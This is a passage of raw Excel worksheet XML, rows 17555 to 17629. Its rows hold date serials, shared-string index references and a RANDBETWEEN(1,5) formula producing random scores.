    <row r="17555" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17555" s="1">
        <v>43180.102650462963</v>
      </c>
      <c r="C17555" t="s">
        <v>41</v>
      </c>
      <c r="E17555" s="2" t="s">
        <v>15801</v>
      </c>
      <c r="F17555">
        <f t="shared" ca="1" si="274"/>
        <v>5</v>
      </c>
    </row>
    <row r="17556" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A17556" s="1">
        <v>43180.080509259256</v>
      </c>
      <c r="C17556" t="s">
        <v>10</v>
      </c>
      <c r="D17556" t="s">
        <v>23</v>
      </c>
      <c r="E17556" s="2" t="s">
        <v>15802</v>
      </c>
      <c r="F17556">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17557" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A17557" s="1">
        <v>43180.077824074076</v>
      </c>
      <c r="C17557" t="s">
        <v>48</v>
      </c>
      <c r="E17557" s="2" t="s">
        <v>15803</v>
      </c>
      <c r="F17557">
        <f t="shared" ca="1" si="274"/>
        <v>3</v>
      </c>
    </row>
    <row r="17558" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17558" s="1">
        <v>43180.072858796295</v>
      </c>
      <c r="C17558" t="s">
        <v>134</v>
      </c>
      <c r="D17558" t="s">
        <v>290</v>
      </c>
      <c r="E17558" t="s">
        <v>15746</v>
      </c>
      <c r="F17558">
        <f t="shared" ca="1" si="274"/>
        <v>3</v>
      </c>
    </row>
    <row r="17559" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17559" s="1">
        <v>43180.010138888887</v>
      </c>
      <c r="C17559" t="s">
        <v>140</v>
      </c>
      <c r="D17559" t="s">
        <v>847</v>
      </c>
      <c r="E17559" t="s">
        <v>15804</v>
      </c>
      <c r="F17559">
        <f t="shared" ca="1" si="274"/>
        <v>3</v>
      </c>
    </row>
    <row r="17560" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17560" s="1">
        <v>43179.998136574075</v>
      </c>
      <c r="C17560" t="s">
        <v>10</v>
      </c>
      <c r="D17560" t="s">
        <v>6</v>
      </c>
      <c r="E17560" t="s">
        <v>15805</v>
      </c>
      <c r="F17560">
        <f t="shared" ca="1" si="274"/>
        <v>2</v>
      </c>
    </row>
    <row r="17561" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A17561" s="1">
        <v>43179.993622685186</v>
      </c>
      <c r="C17561" t="s">
        <v>140</v>
      </c>
      <c r="D17561" t="s">
        <v>46</v>
      </c>
      <c r="E17561" s="2" t="s">
        <v>15806</v>
      </c>
      <c r="F17561">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17562" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17562" s="1">
        <v>43179.974745370368</v>
      </c>
      <c r="C17562" t="s">
        <v>189</v>
      </c>
      <c r="D17562" t="s">
        <v>114</v>
      </c>
      <c r="E17562" t="s">
        <v>15657</v>
      </c>
      <c r="F17562">
        <f t="shared" ca="1" si="274"/>
        <v>3</v>
      </c>
    </row>
    <row r="17563" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17563" s="1">
        <v>43179.963506944441</v>
      </c>
      <c r="C17563" t="s">
        <v>4970</v>
      </c>
      <c r="D17563" t="s">
        <v>158</v>
      </c>
      <c r="E17563" s="2" t="s">
        <v>15807</v>
      </c>
      <c r="F17563">
        <f t="shared" ca="1" si="274"/>
        <v>4</v>
      </c>
    </row>
    <row r="17564" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A17564" s="1">
        <v>43179.954548611109</v>
      </c>
      <c r="C17564" t="s">
        <v>16</v>
      </c>
      <c r="E17564" s="2" t="s">
        <v>15808</v>
      </c>
      <c r="F17564">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17565" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17565" s="1">
        <v>43179.948738425926</v>
      </c>
      <c r="C17565" t="s">
        <v>7058</v>
      </c>
      <c r="D17565" t="s">
        <v>1160</v>
      </c>
      <c r="E17565" t="s">
        <v>15719</v>
      </c>
      <c r="F17565">
        <f t="shared" ca="1" si="274"/>
        <v>5</v>
      </c>
    </row>
    <row r="17566" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17566" s="1">
        <v>43179.936874999999</v>
      </c>
      <c r="C17566" t="s">
        <v>189</v>
      </c>
      <c r="D17566" t="s">
        <v>667</v>
      </c>
      <c r="E17566" t="s">
        <v>15657</v>
      </c>
      <c r="F17566">
        <f t="shared" ca="1" si="274"/>
        <v>4</v>
      </c>
    </row>
    <row r="17567" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A17567" s="1">
        <v>43179.919710648152</v>
      </c>
      <c r="C17567" t="s">
        <v>166</v>
      </c>
      <c r="D17567" t="s">
        <v>993</v>
      </c>
      <c r="E17567" s="2" t="s">
        <v>15809</v>
      </c>
      <c r="F17567">
        <f t="shared" ca="1" si="274"/>
        <v>4</v>
      </c>
    </row>
    <row r="17568" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17568" s="1">
        <v>43179.907210648147</v>
      </c>
      <c r="C17568" t="s">
        <v>410</v>
      </c>
      <c r="E17568" t="s">
        <v>15810</v>
      </c>
      <c r="F17568">
        <f t="shared" ca="1" si="274"/>
        <v>4</v>
      </c>
    </row>
    <row r="17569" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17569" s="1">
        <v>43179.907083333332</v>
      </c>
      <c r="C17569" t="s">
        <v>189</v>
      </c>
      <c r="D17569" t="s">
        <v>39</v>
      </c>
      <c r="E17569" t="s">
        <v>15657</v>
      </c>
      <c r="F17569">
        <f t="shared" ca="1" si="274"/>
        <v>2</v>
      </c>
    </row>
    <row r="17570" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17570" s="1">
        <v>43179.89603009259</v>
      </c>
      <c r="C17570" t="s">
        <v>10</v>
      </c>
      <c r="D17570" t="s">
        <v>6</v>
      </c>
      <c r="E17570" t="s">
        <v>15811</v>
      </c>
      <c r="F17570">
        <f t="shared" ca="1" si="274"/>
        <v>4</v>
      </c>
    </row>
    <row r="17571" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A17571" s="1">
        <v>43179.89439814815</v>
      </c>
      <c r="C17571" t="s">
        <v>41</v>
      </c>
      <c r="E17571" s="2" t="s">
        <v>15812</v>
      </c>
      <c r="F17571">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17572" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17572" s="1">
        <v>43179.885057870371</v>
      </c>
      <c r="C17572" t="s">
        <v>7058</v>
      </c>
      <c r="D17572" t="s">
        <v>56</v>
      </c>
      <c r="E17572" t="s">
        <v>15719</v>
      </c>
      <c r="F17572">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17573" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17573" s="1">
        <v>43179.881377314814</v>
      </c>
      <c r="C17573" t="s">
        <v>4970</v>
      </c>
      <c r="D17573" t="s">
        <v>2214</v>
      </c>
      <c r="E17573" s="2" t="s">
        <v>15813</v>
      </c>
      <c r="F17573">
        <f t="shared" ca="1" si="274"/>
        <v>4</v>
      </c>
    </row>
    <row r="17574" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17574" s="1">
        <v>43179.847650462965</v>
      </c>
      <c r="C17574" t="s">
        <v>10</v>
      </c>
      <c r="D17574" t="s">
        <v>494</v>
      </c>
      <c r="E17574" t="s">
        <v>15673</v>
      </c>
      <c r="F17574">
        <f t="shared" ca="1" si="274"/>
        <v>3</v>
      </c>
    </row>
    <row r="17575" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17575" s="1">
        <v>43179.845208333332</v>
      </c>
      <c r="C17575" t="s">
        <v>10</v>
      </c>
      <c r="D17575" t="s">
        <v>52</v>
      </c>
      <c r="E17575" s="2" t="s">
        <v>15814</v>
      </c>
      <c r="F17575">
        <f t="shared" ca="1" si="274"/>
        <v>2</v>
      </c>
    </row>
    <row r="17576" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17576" s="1">
        <v>43179.836469907408</v>
      </c>
      <c r="C17576" t="s">
        <v>1377</v>
      </c>
      <c r="D17576" t="s">
        <v>1036</v>
      </c>
      <c r="E17576" s="2" t="s">
        <v>15815</v>
      </c>
      <c r="F17576">
        <f t="shared" ca="1" si="274"/>
        <v>4</v>
      </c>
    </row>
    <row r="17577" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17577" s="1">
        <v>43179.836111111108</v>
      </c>
      <c r="C17577" t="s">
        <v>4970</v>
      </c>
      <c r="D17577" t="s">
        <v>821</v>
      </c>
      <c r="E17577" s="2" t="s">
        <v>15816</v>
      </c>
      <c r="F17577">
        <f t="shared" ca="1" si="274"/>
        <v>4</v>
      </c>
    </row>
    <row r="17578" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17578" s="1">
        <v>43179.82739583333</v>
      </c>
      <c r="C17578" t="s">
        <v>1377</v>
      </c>
      <c r="D17578" t="s">
        <v>89</v>
      </c>
      <c r="E17578" s="2" t="s">
        <v>15817</v>
      </c>
      <c r="F17578">
        <f t="shared" ca="1" si="274"/>
        <v>4</v>
      </c>
    </row>
    <row r="17579" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17579" s="1">
        <v>43179.821539351855</v>
      </c>
      <c r="C17579" t="s">
        <v>10</v>
      </c>
      <c r="D17579" t="s">
        <v>229</v>
      </c>
      <c r="E17579" t="s">
        <v>15818</v>
      </c>
      <c r="F17579">
        <f t="shared" ca="1" si="274"/>
        <v>3</v>
      </c>
    </row>
    <row r="17580" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17580" s="1">
        <v>43179.819756944446</v>
      </c>
      <c r="C17580" t="s">
        <v>1377</v>
      </c>
      <c r="D17580" t="s">
        <v>1036</v>
      </c>
      <c r="E17580" s="2" t="s">
        <v>15819</v>
      </c>
      <c r="F17580">
        <f t="shared" ca="1" si="274"/>
        <v>2</v>
      </c>
    </row>
    <row r="17581" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17581" s="1">
        <v>43179.81521990741</v>
      </c>
      <c r="C17581" t="s">
        <v>10</v>
      </c>
      <c r="D17581" t="s">
        <v>6</v>
      </c>
      <c r="E17581" t="s">
        <v>15820</v>
      </c>
      <c r="F17581">
        <f t="shared" ca="1" si="274"/>
        <v>5</v>
      </c>
    </row>
    <row r="17582" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17582" s="1">
        <v>43179.813807870371</v>
      </c>
      <c r="C17582" t="s">
        <v>10</v>
      </c>
      <c r="D17582" t="s">
        <v>11</v>
      </c>
      <c r="E17582" t="s">
        <v>15821</v>
      </c>
      <c r="F17582">
        <f t="shared" ca="1" si="274"/>
        <v>2</v>
      </c>
    </row>
    <row r="17583" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17583" s="1">
        <v>43179.809918981482</v>
      </c>
      <c r="C17583" t="s">
        <v>10</v>
      </c>
      <c r="D17583" t="s">
        <v>11</v>
      </c>
      <c r="E17583" t="s">
        <v>15822</v>
      </c>
      <c r="F17583">
        <f t="shared" ca="1" si="274"/>
        <v>2</v>
      </c>
    </row>
    <row r="17584" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17584" s="1">
        <v>43179.805648148147</v>
      </c>
      <c r="C17584" t="s">
        <v>10</v>
      </c>
      <c r="D17584" t="s">
        <v>11</v>
      </c>
      <c r="E17584" t="s">
        <v>15823</v>
      </c>
      <c r="F17584">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17585" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17585" s="1">
        <v>43179.779641203706</v>
      </c>
      <c r="C17585" t="s">
        <v>73</v>
      </c>
      <c r="D17585" t="s">
        <v>194</v>
      </c>
      <c r="E17585" t="s">
        <v>15746</v>
      </c>
      <c r="F17585">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17586" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17586" s="1">
        <v>43179.777071759258</v>
      </c>
      <c r="C17586" t="s">
        <v>140</v>
      </c>
      <c r="D17586" t="s">
        <v>141</v>
      </c>
      <c r="E17586" t="s">
        <v>15824</v>
      </c>
      <c r="F17586">
        <f t="shared" ca="1" si="274"/>
        <v>5</v>
      </c>
    </row>
    <row r="17587" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17587" s="1">
        <v>43179.776435185187</v>
      </c>
      <c r="C17587" t="s">
        <v>10</v>
      </c>
      <c r="D17587" t="s">
        <v>163</v>
      </c>
      <c r="E17587" t="s">
        <v>15825</v>
      </c>
      <c r="F17587">
        <f t="shared" ca="1" si="274"/>
        <v>3</v>
      </c>
    </row>
    <row r="17588" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17588" s="1">
        <v>43179.77202546296</v>
      </c>
      <c r="C17588" t="s">
        <v>10</v>
      </c>
      <c r="D17588" t="s">
        <v>993</v>
      </c>
      <c r="E17588" t="s">
        <v>15673</v>
      </c>
      <c r="F17588">
        <f t="shared" ca="1" si="274"/>
        <v>4</v>
      </c>
    </row>
    <row r="17589" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17589" s="1">
        <v>43179.75037037037</v>
      </c>
      <c r="C17589" t="s">
        <v>4970</v>
      </c>
      <c r="D17589" t="s">
        <v>36</v>
      </c>
      <c r="E17589" s="2" t="s">
        <v>15826</v>
      </c>
      <c r="F17589">
        <f t="shared" ca="1" si="274"/>
        <v>3</v>
      </c>
    </row>
    <row r="17590" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17590" s="1">
        <v>43179.733171296299</v>
      </c>
      <c r="C17590" t="s">
        <v>4970</v>
      </c>
      <c r="D17590" t="s">
        <v>885</v>
      </c>
      <c r="E17590" s="2" t="s">
        <v>15827</v>
      </c>
      <c r="F17590">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17591" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17591" s="1">
        <v>43179.730868055558</v>
      </c>
      <c r="C17591" t="s">
        <v>63</v>
      </c>
      <c r="D17591" t="s">
        <v>158</v>
      </c>
      <c r="E17591" s="2" t="s">
        <v>15828</v>
      </c>
      <c r="F17591">
        <f t="shared" ca="1" si="274"/>
        <v>5</v>
      </c>
    </row>
    <row r="17592" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17592" s="1">
        <v>43179.719305555554</v>
      </c>
      <c r="C17592" t="s">
        <v>60</v>
      </c>
      <c r="D17592" t="s">
        <v>721</v>
      </c>
      <c r="E17592" t="s">
        <v>15746</v>
      </c>
      <c r="F17592">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17593" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17593" s="1">
        <v>43179.701678240737</v>
      </c>
      <c r="C17593" t="s">
        <v>2986</v>
      </c>
      <c r="D17593" t="s">
        <v>817</v>
      </c>
      <c r="E17593" t="s">
        <v>15778</v>
      </c>
      <c r="F17593">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17594" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A17594" s="1">
        <v>43179.697511574072</v>
      </c>
      <c r="C17594" t="s">
        <v>10</v>
      </c>
      <c r="D17594" t="s">
        <v>52</v>
      </c>
      <c r="E17594" s="2" t="s">
        <v>15829</v>
      </c>
      <c r="F17594">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17595" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17595" s="1">
        <v>43179.696180555555</v>
      </c>
      <c r="C17595" t="s">
        <v>10</v>
      </c>
      <c r="D17595" t="s">
        <v>251</v>
      </c>
      <c r="E17595" s="2" t="s">
        <v>15830</v>
      </c>
      <c r="F17595">
        <f t="shared" ca="1" si="274"/>
        <v>3</v>
      </c>
    </row>
    <row r="17596" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17596" s="1">
        <v>43179.695127314815</v>
      </c>
      <c r="C17596" t="s">
        <v>10</v>
      </c>
      <c r="D17596" t="s">
        <v>6</v>
      </c>
      <c r="E17596" t="s">
        <v>15831</v>
      </c>
      <c r="F17596">
        <f t="shared" ca="1" si="274"/>
        <v>5</v>
      </c>
    </row>
    <row r="17597" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17597" s="1">
        <v>43179.688715277778</v>
      </c>
      <c r="C17597" t="s">
        <v>10</v>
      </c>
      <c r="D17597" t="s">
        <v>52</v>
      </c>
      <c r="E17597" t="s">
        <v>15832</v>
      </c>
      <c r="F17597">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17598" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17598" s="1">
        <v>43179.683136574073</v>
      </c>
      <c r="C17598" t="s">
        <v>4970</v>
      </c>
      <c r="D17598" t="s">
        <v>86</v>
      </c>
      <c r="E17598" s="2" t="s">
        <v>15833</v>
      </c>
      <c r="F17598">
        <f t="shared" ca="1" si="274"/>
        <v>1</v>
      </c>
    </row>
    <row r="17599" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17599" s="1">
        <v>43179.679618055554</v>
      </c>
      <c r="C17599" t="s">
        <v>10</v>
      </c>
      <c r="D17599" t="s">
        <v>39</v>
      </c>
      <c r="E17599" s="2" t="s">
        <v>15834</v>
      </c>
      <c r="F17599">
        <f t="shared" ca="1" si="274"/>
        <v>2</v>
      </c>
    </row>
    <row r="17600" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A17600" s="1">
        <v>43179.671863425923</v>
      </c>
      <c r="C17600" t="s">
        <v>10</v>
      </c>
      <c r="D17600" t="s">
        <v>251</v>
      </c>
      <c r="E17600" s="2" t="s">
        <v>15835</v>
      </c>
      <c r="F17600">
        <f t="shared" ca="1" si="274"/>
        <v>3</v>
      </c>
    </row>
    <row r="17601" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A17601" s="1">
        <v>43179.665266203701</v>
      </c>
      <c r="C17601" t="s">
        <v>10</v>
      </c>
      <c r="D17601" t="s">
        <v>23</v>
      </c>
      <c r="E17601" s="2" t="s">
        <v>15836</v>
      </c>
      <c r="F17601">
        <f t="shared" ca="1" si="274"/>
        <v>5</v>
      </c>
    </row>
    <row r="17602" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17602" s="1">
        <v>43179.613483796296</v>
      </c>
      <c r="C17602" t="s">
        <v>10</v>
      </c>
      <c r="D17602" t="s">
        <v>494</v>
      </c>
      <c r="E17602" t="s">
        <v>15837</v>
      </c>
      <c r="F17602">
        <f t="shared" ref="F17602:F17665" ca="1" si="275">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="17603" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17603" s="1">
        <v>43179.596828703703</v>
      </c>
      <c r="C17603" t="s">
        <v>10</v>
      </c>
      <c r="D17603" t="s">
        <v>6</v>
      </c>
      <c r="E17603" t="s">
        <v>15838</v>
      </c>
      <c r="F17603">
        <f t="shared" ca="1" si="275"/>
        <v>2</v>
      </c>
    </row>
    <row r="17604" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17604" s="1">
        <v>43179.595266203702</v>
      </c>
      <c r="C17604" t="s">
        <v>63</v>
      </c>
      <c r="D17604" t="s">
        <v>107</v>
      </c>
      <c r="E17604" s="2" t="s">
        <v>15839</v>
      </c>
      <c r="F17604">
        <f t="shared" ca="1" si="275"/>
        <v>2</v>
      </c>
    </row>
    <row r="17605" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A17605" s="1">
        <v>43179.581620370373</v>
      </c>
      <c r="C17605" t="s">
        <v>547</v>
      </c>
      <c r="D17605" t="s">
        <v>194</v>
      </c>
      <c r="E17605" s="2" t="s">
        <v>15840</v>
      </c>
      <c r="F17605">
        <f t="shared" ca="1" si="275"/>
        <v>4</v>
      </c>
    </row>
    <row r="17606" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17606" s="1">
        <v>43179.574629629627</v>
      </c>
      <c r="C17606" t="s">
        <v>16</v>
      </c>
      <c r="E17606" t="s">
        <v>15841</v>
      </c>
      <c r="F17606">
        <f t="shared" ca="1" si="275"/>
        <v>5</v>
      </c>
    </row>
    <row r="17607" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17607" s="1">
        <v>43179.564074074071</v>
      </c>
      <c r="C17607" t="s">
        <v>7058</v>
      </c>
      <c r="D17607" t="s">
        <v>750</v>
      </c>
      <c r="E17607" t="s">
        <v>15719</v>
      </c>
      <c r="F17607">
        <f t="shared" ca="1" si="275"/>
        <v>3</v>
      </c>
    </row>
    <row r="17608" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17608" s="1">
        <v>43179.56386574074</v>
      </c>
      <c r="C17608" t="s">
        <v>139</v>
      </c>
      <c r="D17608" t="s">
        <v>330</v>
      </c>
      <c r="E17608" t="s">
        <v>15746</v>
      </c>
      <c r="F17608">
        <f t="shared" ca="1" si="275"/>
        <v>3</v>
      </c>
    </row>
    <row r="17609" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A17609" s="1">
        <v>43179.562847222223</v>
      </c>
      <c r="C17609" t="s">
        <v>253</v>
      </c>
      <c r="E17609" s="2" t="s">
        <v>15842</v>
      </c>
      <c r="F17609">
        <f t="shared" ca="1" si="275"/>
        <v>4</v>
      </c>
    </row>
    <row r="17610" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A17610" s="1">
        <v>43179.554837962962</v>
      </c>
      <c r="C17610" t="s">
        <v>547</v>
      </c>
      <c r="D17610" t="s">
        <v>94</v>
      </c>
      <c r="E17610" s="2" t="s">
        <v>15843</v>
      </c>
      <c r="F17610">
        <f t="shared" ca="1" si="275"/>
        <v>2</v>
      </c>
    </row>
    <row r="17611" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17611" s="1">
        <v>43179.554120370369</v>
      </c>
      <c r="C17611" t="s">
        <v>4970</v>
      </c>
      <c r="D17611" t="s">
        <v>163</v>
      </c>
      <c r="E17611" s="2" t="s">
        <v>15844</v>
      </c>
      <c r="F17611">
        <f t="shared" ca="1" si="275"/>
        <v>3</v>
      </c>
    </row>
    <row r="17612" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17612" s="1">
        <v>43179.544421296298</v>
      </c>
      <c r="C17612" t="s">
        <v>4970</v>
      </c>
      <c r="D17612" t="s">
        <v>750</v>
      </c>
      <c r="E17612" s="2" t="s">
        <v>15845</v>
      </c>
      <c r="F17612">
        <f t="shared" ca="1" si="275"/>
        <v>4</v>
      </c>
    </row>
    <row r="17613" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17613" s="1">
        <v>43179.536956018521</v>
      </c>
      <c r="C17613" t="s">
        <v>10</v>
      </c>
      <c r="D17613" t="s">
        <v>89</v>
      </c>
      <c r="E17613" t="s">
        <v>15846</v>
      </c>
      <c r="F17613">
        <f t="shared" ca="1" si="275"/>
        <v>3</v>
      </c>
    </row>
    <row r="17614" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A17614" s="1">
        <v>43179.536145833335</v>
      </c>
      <c r="C17614" t="s">
        <v>4970</v>
      </c>
      <c r="D17614" t="s">
        <v>124</v>
      </c>
      <c r="E17614" s="2" t="s">
        <v>15847</v>
      </c>
      <c r="F17614">
        <f t="shared" ca="1" si="275"/>
        <v>5</v>
      </c>
    </row>
    <row r="17615" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17615" s="1">
        <v>43179.50576388889</v>
      </c>
      <c r="C17615" t="s">
        <v>10</v>
      </c>
      <c r="D17615" t="s">
        <v>11</v>
      </c>
      <c r="E17615" t="s">
        <v>15848</v>
      </c>
      <c r="F17615">
        <f t="shared" ca="1" si="275"/>
        <v>1</v>
      </c>
    </row>
    <row r="17616" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17616" s="1">
        <v>43179.504490740743</v>
      </c>
      <c r="C17616" t="s">
        <v>10</v>
      </c>
      <c r="D17616" t="s">
        <v>41</v>
      </c>
      <c r="E17616" t="s">
        <v>15849</v>
      </c>
      <c r="F17616">
        <f t="shared" ca="1" si="275"/>
        <v>2</v>
      </c>
    </row>
    <row r="17617" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17617" s="1">
        <v>43179.500717592593</v>
      </c>
      <c r="C17617" t="s">
        <v>10</v>
      </c>
      <c r="D17617" t="s">
        <v>23</v>
      </c>
      <c r="E17617" s="2" t="s">
        <v>15850</v>
      </c>
      <c r="F17617">
        <f t="shared" ca="1" si="275"/>
        <v>5</v>
      </c>
    </row>
    <row r="17618" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A17618" s="1">
        <v>43179.500625000001</v>
      </c>
      <c r="C17618" t="s">
        <v>10</v>
      </c>
      <c r="D17618" t="s">
        <v>112</v>
      </c>
      <c r="E17618" s="2" t="s">
        <v>15851</v>
      </c>
      <c r="F17618">
        <f t="shared" ca="1" si="275"/>
        <v>3</v>
      </c>
    </row>
    <row r="17619" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A17619" s="1">
        <v>43179.483194444445</v>
      </c>
      <c r="C17619" t="s">
        <v>10</v>
      </c>
      <c r="D17619" t="s">
        <v>52</v>
      </c>
      <c r="E17619" s="2" t="s">
        <v>15852</v>
      </c>
      <c r="F17619">
        <f t="shared" ca="1" si="275"/>
        <v>4</v>
      </c>
    </row>
    <row r="17620" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A17620" s="1">
        <v>43179.480115740742</v>
      </c>
      <c r="C17620" t="s">
        <v>280</v>
      </c>
      <c r="E17620" s="2" t="s">
        <v>15853</v>
      </c>
      <c r="F17620">
        <f t="shared" ca="1" si="275"/>
        <v>3</v>
      </c>
    </row>
    <row r="17621" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A17621" s="1">
        <v>43179.476851851854</v>
      </c>
      <c r="C17621" t="s">
        <v>41</v>
      </c>
      <c r="E17621" s="2" t="s">
        <v>15854</v>
      </c>
      <c r="F17621">
        <f t="shared" ca="1" si="275"/>
        <v>1</v>
      </c>
    </row>
    <row r="17622" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17622" s="1">
        <v>43179.468738425923</v>
      </c>
      <c r="C17622" t="s">
        <v>10</v>
      </c>
      <c r="D17622" t="s">
        <v>20</v>
      </c>
      <c r="E17622" t="s">
        <v>15855</v>
      </c>
      <c r="F17622">
        <f t="shared" ca="1" si="275"/>
        <v>3</v>
      </c>
    </row>
    <row r="17623" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A17623" s="1">
        <v>43179.467986111114</v>
      </c>
      <c r="C17623" t="s">
        <v>71</v>
      </c>
      <c r="D17623" t="s">
        <v>312</v>
      </c>
      <c r="E17623" s="2" t="s">
        <v>15856</v>
      </c>
      <c r="F17623">
        <f t="shared" ca="1" si="275"/>
        <v>2</v>
      </c>
    </row>
    <row r="17624" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A17624" s="1">
        <v>43179.461724537039</v>
      </c>
      <c r="C17624" t="s">
        <v>10</v>
      </c>
      <c r="D17624" t="s">
        <v>163</v>
      </c>
      <c r="E17624" s="2" t="s">
        <v>15857</v>
      </c>
      <c r="F17624">
        <f t="shared" ca="1" si="275"/>
        <v>1</v>
      </c>
    </row>
    <row r="17625" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A17625" s="1">
        <v>43179.458298611113</v>
      </c>
      <c r="C17625" t="s">
        <v>65</v>
      </c>
      <c r="E17625" s="2" t="s">
        <v>15858</v>
      </c>
      <c r="F17625">
        <f t="shared" ca="1" si="275"/>
        <v>3</v>
      </c>
    </row>
    <row r="17626" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A17626" s="1">
        <v>43179.442650462966</v>
      </c>
      <c r="C17626" t="s">
        <v>48</v>
      </c>
      <c r="E17626" s="2" t="s">
        <v>15859</v>
      </c>
      <c r="F17626">
        <f t="shared" ca="1" si="275"/>
        <v>2</v>
      </c>
    </row>
    <row r="17627" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A17627" s="1">
        <v>43179.436435185184</v>
      </c>
      <c r="C17627" t="s">
        <v>48</v>
      </c>
      <c r="E17627" t="s">
        <v>15860</v>
      </c>
      <c r="F17627">
        <f t="shared" ca="1" si="275"/>
        <v>3</v>
      </c>
    </row>
    <row r="17628" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A17628" s="1">
        <v>43179.435671296298</v>
      </c>
      <c r="C17628" t="s">
        <v>63</v>
      </c>
      <c r="D17628" t="s">
        <v>151</v>
      </c>
      <c r="E17628" s="2" t="s">
        <v>15861</v>
      </c>
      <c r="F17628">
        <f t="shared" ca="1" si="275"/>
        <v>3</v>
      </c>
    </row>
    <row r="17629" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A17629" s="1">
        <v>43179.431354166663</v>
      </c>
      <c r="C17629" t="s">
        <v>41</v>
      </c>
      <c r="D17629" t="s">
        <v>33</v>
      </c>
      <c r="E17629" s="2" t="s">
        <v>15862</v>
      </c>
      <c r="F17629">
        <f t="shared" ca="1" si="275"/>
        <v>3</v>
